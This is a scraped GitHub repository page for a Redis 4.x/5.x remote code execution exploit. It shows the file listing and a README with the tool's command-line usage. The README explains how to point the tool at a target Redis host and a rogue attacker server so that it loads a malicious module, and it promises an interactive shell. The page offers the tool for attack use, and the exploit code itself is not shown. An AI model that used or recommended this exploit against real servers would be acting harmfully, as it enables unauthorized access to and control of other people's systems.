Skip to content
Redis 4.x/5.x RCE
Branch: master
Clone or download
Latest commit 7ea6fd4 Jul 11, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore redis rce Jul 8, 2019 delete .so Jul 11, 2019
requirements.txt delete .so Jul 11, 2019

Redis RCE

A exploit for Redis 4.x/5.x RCE, inspired by Redis post-exploitation.

This repo is a modified version of .


Compile from

usage: [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE]
                    [-a AUTH] [-v]

Redis 4.x/5.x RCE with RedisModules

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        target host
  -p RPORT, --rport RPORT
                        target redis port, default 6379
  -L LHOST, --lhost LHOST
                        rogue server ip
  -P LPORT, --lport LPORT
                        rogue server listen port, default 21000
  -f FILE, --file FILE  RedisModules to load, default
  -a AUTH, --auth AUTH  redis password
  -v, --verbose         show more info


python -r -L -f

The default target port is 6379 and the default vps port is 21000.

And you will get an interactive shell!

You can’t perform that action at this time.